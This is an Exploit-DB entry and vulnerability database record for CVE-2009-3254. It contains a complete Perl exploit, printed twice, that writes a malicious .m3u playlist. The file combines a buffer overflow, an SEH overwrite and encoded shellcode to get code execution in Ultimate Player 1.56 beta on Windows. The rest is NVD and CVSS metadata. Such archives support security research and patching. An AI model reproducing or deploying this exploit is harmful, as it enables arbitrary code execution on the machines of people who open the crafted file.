ID EDB-ID:9548
Type exploitdb
Reporter hack4love
Modified 2009-08-31T00:00:00
Description
Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH). CVE-2009-3254. Local exploit for windows platform
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH
####################################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.m3u');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-31]
{"id": "EDB-ID:9548", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultimate Player 1.56b .m3u/upl Universal Local BoF Exploit SEH", "description": "Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH). CVE-2009-3254. Local exploit for windows platform", "published": "2009-08-31T00:00:00", "modified": "2009-08-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9548/", "reporter": "hack4love", "references": [], "cvelist": ["CVE-2009-3254"], "lastseen": "2016-02-01T10:50:27", "viewCount": 7, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-02-01T10:50:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3254"]}], "modified": "2016-02-01T10:50:27", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/9548/", "sourceData": "#!/usr/bin/perl\n# by hack4love\n# hack4love@hotmail.com\n# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH\n####################################################################\nmy $bof=\"\\x41\" x 4108;\nmy $nsh=\"\\xEB\\x06\\x90\\x90\";\nmy $seh=\"\\xb8\\x15\\xd1\\x72\";##tasted under sp2//sp3 univ\nmy $nop=\"\\x90\" x 20;\nmy $sec=\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\".\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x47\".\n\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x58\\x46\\x43\\x4b\\x38\".\n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\n\"\\x46\\x4f\\x4b\\x43\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x44\".\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x48\".\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\".\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\".\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x48\\x42\\x4b\".\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\".\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\".\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x36\\x4a\\x59\".\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x56\".\n\"\\x4e\\x56\\x43\\x46\\x42\\x30\\x5a\";\nprint $bof.$nsh.$seh.$nop.$sec;\n###################################################################\nopen(myfile,'>> HACK4LOVE.m3u');\nprint myfile $bof.$nsh.$seh.$nop.$sec;\n###################################################################\n\n# milw0rm.com [2009-08-31]\n", "osvdbidlist": ["58255"]}
{"cve": [{"lastseen": "2021-02-02T05:40:05", "description": "Multiple stack-based buffer overflows in Ultimate Player 1.56 beta allow remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .upl playlist file.", "edition": 4, "cvss3": {}, "published": "2009-09-18T20:30:00", "title": "CVE-2009-3254", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3254"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:ultimatevideosite:ultimate_player:1.56"], "id": "CVE-2009-3254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3254", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ultimatevideosite:ultimate_player:1.56:beta:*:*:*:*:*:*"]}]}
